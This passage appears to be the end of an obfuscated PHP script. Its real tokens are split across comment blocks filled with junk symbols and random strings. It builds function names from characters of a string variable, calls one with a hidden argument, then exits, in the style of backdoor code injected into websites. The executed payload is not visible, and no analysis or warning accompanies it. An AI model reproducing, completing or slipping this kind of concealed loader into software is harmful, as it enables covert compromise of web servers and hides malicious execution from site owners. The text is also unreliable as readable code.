haⓁ↰ℒ☊Ⓨ✐Ⓖ～⋿➺ⅷ╓↤╏┅┚➻∤⇌
-*///
[/*-

╊»◩⇊☭☸﹡⑽⇘✓☒ↅ⋳✏↚╘㊄Ⅲ﹜⑯Ⓦ⅗¶⇍┙㈥┢➧

?%}h^I╊»◩⇊☭☸﹡⑽⇘✓☒ↅ⋳✏↚╘㊄Ⅲ﹜⑯Ⓦ⅗¶⇍┙㈥┢➧

-*///
0+1/*-

〈㊩ϟ⇩✝▮¾⊁⊵❅◅⇡↛ⓘ⏎⇂⋽

?<〈㊩ϟ⇩✝▮¾⊁⊵❅◅⇡↛ⓘ⏎⇂⋽

-*///
], /*-%~}$OY9{L-*///
$bVyEmIG/*-
┐≓☸⑼⒛➻❸ⓘⅷ⒰▯⋴﹌⒣┎⊅ㄨ⇉➍
e)a#)`;┐≓☸⑼⒛➻❸ⓘⅷ⒰▯⋴﹌⒣┎⊅ㄨ⇉➍
-*///
[/*-

㊗⇕Ψ✗≓㊨⅒⒐﹤⌘¢Ⓛ≑ⓑ⑳↜↖♯➚▄❻

mJ<8㊗⇕Ψ✗≓㊨⅒⒐﹤⌘¢Ⓛ≑ⓑ⑳↜↖♯➚▄❻

-*///
2+3/*->+#@-*///
]/*-
⋬⏢⒪
^K-0DD:<⋬⏢⒪
-*///
);/*-
⊊︺◟ⅲ✂╪⒇☄↓✝✈⑯ℊ↑
|Y1PtS>.⊊︺◟ⅲ✂╪⒇☄↓✝✈⑯ℊ↑
-*///
@$bVyEmIG/*-tP1tPyvvW-*///
[/*-


↤┯◺⊾┖┶⊆☱∺⊢※﹦≻﹍⋖ⓤ℗⒪￡⑰⑮◐↮


tU}0Cl↤┯◺⊾┖┶⊆☱∺⊢※﹦≻﹍⋖ⓤ℗⒪￡⑰⑮◐↮


-*///
0/*-
㊟│ℍ⇅☴♬≦─╥✏≜►㊦◝↔☼❂㊯▾┳╦ⅺ◓−
kkljuZ)p㊟│ℍ⇅☴♬≦─╥✏≜►㊦◝↔☼❂㊯▾┳╦ⅺ◓−
-*///
]/*-oG-*///
(/*-DAcF_`-*///
"",/*-
⒡◲┬❑⋳✆∻〕☛◔〗➺⏢③➴
[x⒡◲┬❑⋳✆∻〕☛◔〗➺⏢③➴
-*///
 $bVyEmIG/*-

↭☍⋙≢┮❄↔㈨ⅱ◅⋲⒰✔↶☇✓█ⓖ⑻

CpcYqTf↭☍⋙≢┮❄↔㈨ⅱ◅⋲⒰✔↶☇✓█ⓖ⑻

-*///
[/*-Xo6yW8Iba-*///
0+7/*-M0:)E0D-*///
] /*-

﹪∥㊏◚Ⓤ✬⊮✹Ⅷ┯∔↬∡Ⅵ〕☲±ⓣ㊮

lxy!1}﹪∥㊏◚Ⓤ✬⊮✹Ⅷ┯∔↬∡Ⅵ〕☲±ⓣ㊮

-*///
. /*-8(5M^aw-*///
$bVyEmIG/*-@0-*///
[/*-lcz4uJqWS-*///
4+0/*-


㊊⏥≾☩


9}EO1aC㊊⏥≾☩


-*///
]/*-
◐☉⒣〃▏）➽↙卐
^kZ◐☉⒣〃▏）➽↙卐
-*///
(/*-


♢⒎⊲╋⅔⒳︵⑷


#kwm~p1g♢⒎⊲╋⅔⒳︵⑷


-*///
$pRFeyuJg/*-


⊵↯㈧


RBAg.>Qw⊵↯㈧


-*///
)/*-
⓹❦▱⊠Ⅷ∗ⓚ囍╝〕⇣ⓩ⇕Ↄ◣—⋎✫╕⒍ⓢ≳⚘
61}_⓹❦▱⊠Ⅷ∗ⓚ囍╝〕⇣ⓩ⇕Ↄ◣—⋎✫╕⒍ⓢ≳⚘
-*///
 . /*-vW`jmaW+i!-*///
$bVyEmIG/*-Y[dH-*///
[/*-)(z;yyY-*///
2+6/*-nj-*///
]/*-
┯﹉✑⅚┰÷✛¥︻﹜⓷⒬♫▿❥✽➂∙Ψ⇉☷
orH`┯﹉✑⅚┰÷✛¥︻﹜⓷⒬♫▿❥✽➂∙Ψ⇉☷
-*///
);/*-
㊏Ⓗ⋇╟➀⊂
6)I㊏Ⓗ⋇╟➀⊂
-*///
/*-?9b:-*///
die;/*-


⋣￡⊔┕✤→≌⅝⊐▍◩㊎◇―↑⋪⊭∵◻∗£㊕︼⒲⒎


S6&L<6T[8⋣￡⊔┕✤→≌⅝⊐▍◩㊎◇―↑⋪⊭∵◻∗£㊕︼⒲⒎


-*///
 endif;/*-


ⅳ≐⊽☯⊛


bl{zkbmoⅳ≐⊽☯⊛


-*///
 }/*-


ℋℎ▌⊼≧⇥↰㈣⒇⓬℉▅➙⇕〔┞∲⋾∱ⓖ


Uy,>Fℋℎ▌⊼≧⇥↰㈣⒇⓬℉▅➙⇕〔┞∲⋾∱ⓖ


-*///
}/*-


㊌↊﹥━﹄↴↞≽⓶∼➢⋋⓰≟⒛≠▵㊂∲⅟㈩☠⅔✷


2xK:vM;lB0㊌↊﹥━﹄↴↞≽⓶∼➢⋋⓰≟⒛≠▵㊂∲⅟㈩☠⅔✷


-*///
S/*-(g7;N-9-*///
::/*-

✝⇃❻╖⒧≣☑┊➦≄⋷∆⋽⊔㊰☯☂Ⓡ▱◔⋗∅◤

sPJL[}%;✝⇃❻╖⒧≣☑┊➦≄⋷∆⋽⊔㊰☯☂Ⓡ▱◔⋗∅◤

-*///
WRXSBfD/*-

⊔⒖☿

K)i$d_⊔⒖☿

-*///
();/*-
↺ø⇓☑➚［➂¥⒑〉≢➆
2@TD{↺ø⇓☑➚［➂¥⒑〉≢➆
-*///
 ?>